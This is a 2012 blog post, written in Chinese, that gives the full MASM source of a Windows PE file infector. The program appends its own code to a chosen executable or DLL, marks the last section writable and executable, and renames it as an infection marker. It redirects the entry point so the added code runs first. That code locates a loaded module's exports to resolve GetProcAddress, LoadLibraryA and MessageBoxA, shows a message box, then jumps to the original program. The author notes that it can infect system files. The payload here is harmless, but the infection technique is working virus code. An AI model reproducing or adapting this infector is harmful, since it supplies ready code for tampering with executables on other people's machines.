2012年7月5日星期四

extend_end_section_run.asm


;在最后一个节添加代码并先运行。
;不足的地方敬请指导,如优化程序,加快速度,减少代码等。
;不能感染正在运行的文件(包括本身)。
;感染一些文件(加密,压缩,打包,加壳等程序)能成功,但运行之后不能正常运行原来的程序。
;可以感染系统文件。
;没有异常处理。
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
include comdlg32.inc
includelib user32.lib
includelib kernel32.lib
includelib comdlg32.lib
.data
FilterString db "pe File (*.exe, *.dll)",0,"*.exe;*.dll",0,0 ; GetOpenFileName filter: display text, pattern, double NUL
sectionname db ".correy ",0; name written over the last section header; also the "already processed" marker
Characteristics dword 0e0000020h ; value written to the last section header's Characteristics (code|exec|read|write)
infect db "文件已经感染!",0 ; shown when the marker is already present
.data?
ofn OPENFILENAME <>
buffercmp db 40 dup (?)          ; not referenced in this file
buffer db 4096 DUP (?)           ; receives the chosen path; also reused as the WriteFile byte-count output
mz dd ?                          ; address of the mapped view (DOS header)
pe dd ?                          ; address of the "PE" signature in the view
OptionalHeader dd ?              ; pe + 24
header dd ?                      ; address of the first section header
sizeOfOptionalHeader dd ?        ; SizeOfOptionalHeader from the file header
sizeofallheader dd ?             ; SizeOfHeaders from the optional header
lsizeofallheader dd ?            ; mz + sizeofallheader; not read afterwards
sections dd ?                    ; NumberOfSections
newheader dd ?; address just past the last section header (in the view)
lnewheader dd ? ; the same position as a file offset
hfile dd ?
lpe dd ? ; file offset of the "PE" signature (e_lfanew)
sectionalignment dd ?
filealignment dd ?
x dd ?                           ; scratch
y dd ?                           ; scratch
z dd ?                           ; not referenced in this file
startwritecode dd ?              ; file offset where the correy..vendcode block is written
newsizeofimage dd ?
newvirtualsize dd ?
newsizeofrawdata dd ?
oldaddressofentrypoint dd ?      ; original AddressOfEntryPoint; later turned into the jmp displacement
newaddressofentrypoint dd ?
.code
; Everything from correy up to vendcode is the block that start copies
; into the target file, so these dd ? cells are written at run time
; inside a code section (hence the writable bit in Characteristics).
; They are always addressed as [ebx+sym] with ebx = relocation delta.
correy db "made by correy ",0 ; start of the copied block; also the MessageBox text and caption
vdata db 0
szGetProcAddress db "GetProcAddress",0 ; looked up by walking the export name table
szLoadLibrary db 'LoadLibraryA',0
szUser32 db 'user32',0
szmessagebox db 'MessageBoxA',0
pel dd ?; address of the "PE" signature of the module found at k
OptionalHeaderl dd ?; pel + 24
headerl dd ? ; first section header; not read afterwards
sizeOfOptionalHeaderl dd ?;
sectionsl dd ?   ; NumberOfSections; not read afterwards
nnps dd ?        ; export directory NumberOfNames; not read afterwards
e dd ?; address of the export directory
k dd ?; base address of the module found by the backward scan
apiaddress dd ?; AddressOfFunctions (absolute)
apinameaddress dd ?; AddressOfNames (absolute)
ordinaladdress dd ?; AddressOfNameOrdinals (absolute)
apis dd ?        ; export directory NumberOfFunctions; not read afterwards
n dd ?; not referenced in this file
i dd ?; name index plus export Base
o dd ?; word read from the ordinal table at index i
f dd ?; resolved address of GetProcAddress
ob dd ?          ; export directory Base
ipapiloadlibrary dd ?
ipapiuser32 dd ?
ipapimessagebox dd ?
;-----------------------------------------------------------------------
; vstartcode: entry point that start installs in the target file.
; Flow: compute the relocation delta into ebx, find the module that
; contains the dword on top of the stack by scanning downward for an
; MZ/PE header, walk that module's export directory for GetProcAddress,
; resolve LoadLibraryA and MessageBoxA, show a message box, then jump to
; the original entry point through the jmp at jmptoold.
; Registers: ebx = delta (kept for the whole block); eax, ecx, edx,
;            esi, edi are scratch.
;-----------------------------------------------------------------------
vstartcode:
call rel                         ; pushes the run-time address of rel
rel: pop ebx
sub ebx,rel                      ; ebx = run-time address - assembled address
push [esp]                       ; duplicate the dword on top of the stack
mov edi,[esp]
and edi,0ffff0000h               ; round down to a 64 KiB boundary
againk:push edi                  ; scan downward 64 KiB at a time until an MZ/PE header is found
cmp word ptr [edi],5a4dh         ; "MZ"
jne nextk
add edi,[edi+3ch]                ; edi += e_lfanew
cmp word ptr [edi],4550h         ; "PE"
jne nextk
pop edi                          ; restore the candidate base
mov eax,edi
jmp showk
nextk:pop edi
sub edi,10000h
jmp againk
showk:mov [ebx+k],eax            ; k = module base
add eax,3ch
mov eax,[eax]                    ; e_lfanew
add eax,[ebx+k]
mov [ebx+pel],eax                ; pel = address of the "PE" signature
mov esi,[ebx+pel]
add esi,6
mov dx,word ptr [esi]            ; NumberOfSections (file header +2)
movsx edx,dx
mov [ebx+sectionsl],edx
mov esi,[ebx+pel]
add esi,24
mov [ebx+OptionalHeaderl],esi    ; optional header = signature (4) + file header (20)
mov esi,[ebx+pel]
add esi,20
mov dx,word ptr [esi]            ; SizeOfOptionalHeader (file header +16)
movsx edx,dx
mov [ebx+sizeOfOptionalHeaderl],edx
mov esi,[ebx+OptionalHeaderl ]
add esi,[ebx+sizeOfOptionalHeaderl]
mov [ebx+headerl],esi            ; first section header
mov esi,[ebx+OptionalHeaderl]
add esi,96
mov esi,[esi]                    ; DataDirectory[0].VirtualAddress = export table RVA (PE32 optional header +96)
mov edi,esi
add esi,[ebx+k]                  ; esi is not used after this
add edi,[ebx+k]
mov [ebx+e],edi                  ; e = export directory (absolute)
mov edi,[ebx+e]
add edi,12
mov edi,[edi]                    ; export Name RVA
add edi,[ebx+k]                  ; result is discarded by the next mov
mov edi,[ebx+e]
add edi,16
mov edi,[edi]
mov [ebx+ob],edi                 ; Base (ordinal bias)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov edi,[ebx+e]
add edi,20
mov edi,[edi]
mov [ebx+apis],edi               ; NumberOfFunctions
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov edi,[ebx+e]
add edi,24
mov edi,[edi]
mov [ebx+nnps],edi               ; NumberOfNames
mov edi,[ebx+e]
add edi,28
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+apiaddress],edi         ; AddressOfFunctions (absolute)
mov edi,[ebx+e]
add edi,32
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+apinameaddress],edi     ; AddressOfNames (absolute)
mov edi,[ebx+e]
add edi,36
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+ordinaladdress],edi     ; AddressOfNameOrdinals (absolute)
; find the index of "GetProcAddress" in the name table
mov edx,[ebx+apinameaddress]     ; edx = current name-table entry
xor eax,eax                      ; eax = name index
againke:push edx
mov edi,[edx]
add edi,[ebx+k]                  ; edi = exported name string
push eax
lea eax,[ebx+szGetProcAddress]
mov esi,eax                      ; esi = "GetProcAddress"
pop eax
mov ecx,14                       ; compares the 14 characters of "GetProcAddress"; the NUL is not compared
repe cmpsb
je nextke
pop edx
add edx,4                        ; next RVA in the name table
inc eax
jmp againke                      ; loops until a match; nnps is not consulted
nextke:
pop edx ; author's note: this pop restores the stack after the push at againke
add eax,[ebx+ob]                 ; index + Base
mov [ebx+i],eax
; read the ordinal table at that index
mov eax,[ebx+i]
mov edx,[ebx+ordinaladdress]
shl eax,1                        ; word entries
add eax,edx
movzx eax,word ptr [eax]
mov [ebx+o],eax
; f = k + AddressOfFunctions[o - Base]
mov eax,[ebx+o]
sub eax,[ebx+ob]
mov edx,[ebx+apiaddress]
shl eax,2                        ; dword entries
add eax,edx
mov eax,[eax]
add eax,[ebx+k]
mov [ebx+f],eax                  ; f = GetProcAddress
; ipapiloadlibrary = GetProcAddress(k, "LoadLibraryA")
lea eax,[ebx+szLoadLibrary]
push eax
push [ebx+k]
call [ebx+f] ; stdcall: the callee pops both arguments
mov [ebx+ipapiloadlibrary],eax
; ipapiuser32 = LoadLibraryA("user32")
lea eax,[ebx+szUser32]
push eax
call [ebx+ipapiloadlibrary]
mov [ebx+ipapiuser32],eax
; ipapimessagebox = GetProcAddress(ipapiuser32, "MessageBoxA")
lea eax,[ebx+szmessagebox]
push eax
push [ebx+ipapiuser32]
call [ebx+f]
mov [ebx+ipapimessagebox],eax
; MessageBoxA(0, correy, correy, 0)
push 0                           ; uType
lea eax,[ebx+correy]
push eax                         ; lpCaption
push eax                         ; lpText
push 0                           ; hWnd
call [ebx+ipapimessagebox]
jmptoold:
db 0e9h                          ; opcode of jmp rel32
oldentry:
dd ?                             ; rel32 displacement, filled in on disk by start
vendcode dd ?                    ; end marker of the copied block
;-----------------------------------------------------------------------
; dword alignit(dword sizes, dword aligns)
; Rounds sizes up to the next multiple of aligns; an exact multiple
; (including 0) is returned unchanged.
; ABI:   stdcall, MASM-generated prologue/epilogue (args popped on ret)
; Out:   eax = rounded value
; Clobb: flags; edx is saved around the div/mul pair
; Note:  aligns = 0 raises a divide fault, as for any unsigned div.
;-----------------------------------------------------------------------
alignit proc sizes,aligns
        push    edx                     ; div and mul both write edx
        mov     eax,sizes
        xor     edx,edx                 ; edx:eax = sizes
        div     aligns                  ; eax = quotient, edx = remainder
        test    edx,edx
        jz      @F                      ; exact multiple: keep the quotient
        inc     eax                     ; otherwise round the quotient up
@@:     mul     aligns                  ; eax = quotient * aligns
        pop     edx
        ret
alignit endp
;-----------------------------------------------------------------------
; start: program entry point.
; Asks for a file, maps it read-only to read its headers, then writes
; the changes to disk through hfile (the view is never written):
;   - last section header: Characteristics, Name, VirtualSize,
;     SizeOfRawData
;   - optional header: SizeOfImage, AddressOfEntryPoint
;   - the block correy..vendcode, appended after the last section's
;     data, and the rel32 of the jmp at jmptoold.
; Field offsets below are relative to pe (the "PE" signature) or to
; newheader (the byte just past the last section header).
;-----------------------------------------------------------------------
start:
mov ofn.lStructSize,SIZEOF ofn
mov ofn.lpstrFilter, OFFSET FilterString
mov ofn.lpstrFile, OFFSET buffer
mov ofn.nMaxFile,512            ; only 512 of buffer's 4096 bytes are offered to the dialog
mov ofn.Flags,00281804h         ; OFN_EXPLORER|OFN_LONGNAMES|OFN_FILEMUSTEXIST|OFN_PATHMUSTEXIST|OFN_HIDEREADONLY
invoke GetOpenFileName, ADDR ofn
invoke CreateFile,addr buffer,0c0000000h,3,0,3,80h,0 ; GENERIC_READ|GENERIC_WRITE, share read+write, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
mov hfile,eax
invoke CreateFileMapping,eax,0,2,0,0,0 ; PAGE_READONLY
invoke MapViewOfFile,eax,4,0,0,0       ; FILE_MAP_READ
; author's note: there is no check that the file is really a PE image;
; a few files carry the extension without a valid PE layout.
mov mz,eax                      ; view base = DOS header
mov esi,mz
add esi,3ch
mov esi,[esi]                   ; e_lfanew
mov lpe,esi                     ; file offset of the "PE" signature
mov eax,mz
add esi,eax
mov pe,esi; address of the "PE" signature in the view
mov esi,pe
add esi,6
mov dx,word ptr [esi]           ; NumberOfSections (file header +2)
movsx edx,dx
mov sections,edx; number of sections
mov esi,pe
add esi,24
mov OptionalHeader,esi ; signature (4) + file header (20)
mov esi,pe
add esi,40
mov esi,[esi]                   ; AddressOfEntryPoint (optional header +16)
mov oldaddressofentrypoint,esi ; original entry point RVA
mov esi,pe
add esi,20
mov dx,word ptr [esi]           ; SizeOfOptionalHeader (file header +16)
movsx edx,dx
mov sizeOfOptionalHeader,edx; size of the optional header
mov esi,pe
add esi,84
mov esi,[esi]                   ; SizeOfHeaders (optional header +60)
mov sizeofallheader,esi ; size of all headers
mov eax,mz
add eax,sizeofallheader
mov lsizeofallheader,eax; end of the headers in the view; not read below
mov esi,pe
add esi,56
mov esi,[esi]                   ; SectionAlignment (optional header +32)
mov sectionalignment,esi ; section alignment
mov esi,pe
add esi,60
mov esi,[esi]                   ; FileAlignment (optional header +36)
mov filealignment,esi ; file alignment
mov esi,OptionalHeader
add esi,sizeOfOptionalHeader
mov header,esi ; first section header
mov eax,40                      ; sizeof IMAGE_SECTION_HEADER
mov ebx,sections
mul ebx
add eax,header
mov newheader,eax; one past the last section header; its fields are read as [newheader-40+field]
sub eax,mz
mov lnewheader,eax              ; the same position as a file offset
; already marked? the marker is the Name of the last section header
mov eax,newheader
sub eax,40
mov esi,eax                     ; last section header Name (header +0)
lea edi,sectionname
mov ecx,8
repe cmpsb
je infected
startadd:
mov eax,newheader
sub eax,20
mov eax,[eax]                   ; PointerToRawData (header +20)
mov x,eax
mov eax,newheader
sub eax,32
mov eax,[eax]                   ; VirtualSize (header +8)
add eax,x
mov startwritecode,eax          ; file offset = PointerToRawData + VirtualSize
; last section Characteristics (header +36) <- Characteristics
mov eax,lnewheader
sub eax,4
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr Characteristics,4,addr buffer,0 ; buffer receives the byte count
; SizeOfImage += growth of the last section, measured in SectionAlignment units
mov eax,newheader
sub eax,32
mov eax,[eax]                   ; VirtualSize
mov x,eax
push sectionalignment
push eax
call alignit                    ; y = alignit(VirtualSize, SectionAlignment)
mov y,eax
mov eax,x
add eax,offset vendcode - offset correy ; VirtualSize + length of the appended block
push sectionalignment
push eax
call alignit
sub eax,y                       ; growth
mov y,eax
mov eax,pe
add eax,80
mov eax,[eax]                   ; SizeOfImage (optional header +56)
add eax,y
mov newsizeofimage,eax
mov ebx,lpe
add ebx,80
invoke SetFilePointer,hfile,ebx,0,0
invoke WriteFile,hfile,addr newsizeofimage,4,addr buffer,0
; AddressOfEntryPoint <- RVA of vstartcode inside the appended block
mov eax,newheader
sub eax,28
mov eax,[eax]                   ; VirtualAddress (header +12)
mov y,eax
mov eax,newheader
sub eax,32
mov eax,[eax]                   ; VirtualSize
add eax,y
mov y,eax                       ; y = RVA at which correy will start (kept until the end)
mov eax,lpe
add eax,40
invoke SetFilePointer,hfile,eax,0,0
mov eax,y
add eax,offset vstartcode - offset correy
mov newaddressofentrypoint,eax
invoke WriteFile,hfile,addr newaddressofentrypoint,4,addr buffer,0
; append the block correy..vendcode at startwritecode
invoke SetFilePointer,hfile,startwritecode,0,0
invoke WriteFile,hfile,addr correy,offset vendcode - offset correy,addr buffer,0
mov eax,newheader
sub eax,32
mov eax,[eax]                   ; VirtualSize
add eax,offset vendcode - offset correy
push filealignment
push eax
call alignit                    ; alignit(VirtualSize + block length, FileAlignment)
mov x,eax
mov eax,newheader
sub eax,20
mov eax,[eax]                   ; PointerToRawData
add eax,x
mov x,eax                       ; x = file offset of the end of the padded raw data
invoke SetFilePointer,hfile,x,0,0 ; superseded by the next SetFilePointer
mov eax,x
sub eax,sizeof correy
invoke SetFilePointer,hfile,eax,0,0; author's note: wrong
invoke WriteFile,hfile,addr correy,sizeof correy,addr buffer,0 ; writes the signature string ending at x, which also extends the file to x if it was shorter
; Name of the last section header <- sectionname (the marker checked above)
mov eax,lnewheader
sub eax,40
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr sectionname,8,addr buffer,0
; VirtualSize of the last section header <- VirtualSize + block length
mov eax,newheader
sub eax,32
mov eax,[eax]
add eax,offset vendcode - offset correy
mov newvirtualsize,eax
mov eax,lnewheader
sub eax,32
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr newvirtualsize,4,addr buffer,0
; SizeOfRawData of the last section header (header +16) <- alignit(newvirtualsize, FileAlignment)
push filealignment
push newvirtualsize
call alignit
mov newsizeofrawdata,eax
mov eax,lnewheader
sub eax,24
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr newsizeofrawdata,4,addr buffer,0
; rel32 of the jmp at jmptoold <- old entry RVA - RVA of vendcode (the byte after the jmp)
mov eax,startwritecode
add eax,offset oldentry - offset correy ; file offset of the dd following the 0e9h opcode
invoke SetFilePointer,hfile,eax,0,0
mov eax,y                       ; y = RVA of correy
add eax,offset vendcode - offset correy
sub oldaddressofentrypoint,eax
invoke WriteFile,hfile,addr oldaddressofentrypoint,4,addr buffer,0
invoke FlushFileBuffers,hfile
invoke CloseHandle,hfile        ; the view and the mapping handle are not released here; ExitProcess reclaims them
jmp exit
infected:invoke MessageBox,0,addr infect,addr infect,0
exit:
invoke ExitProcess,NULL
end start
;made at 2010.08.24
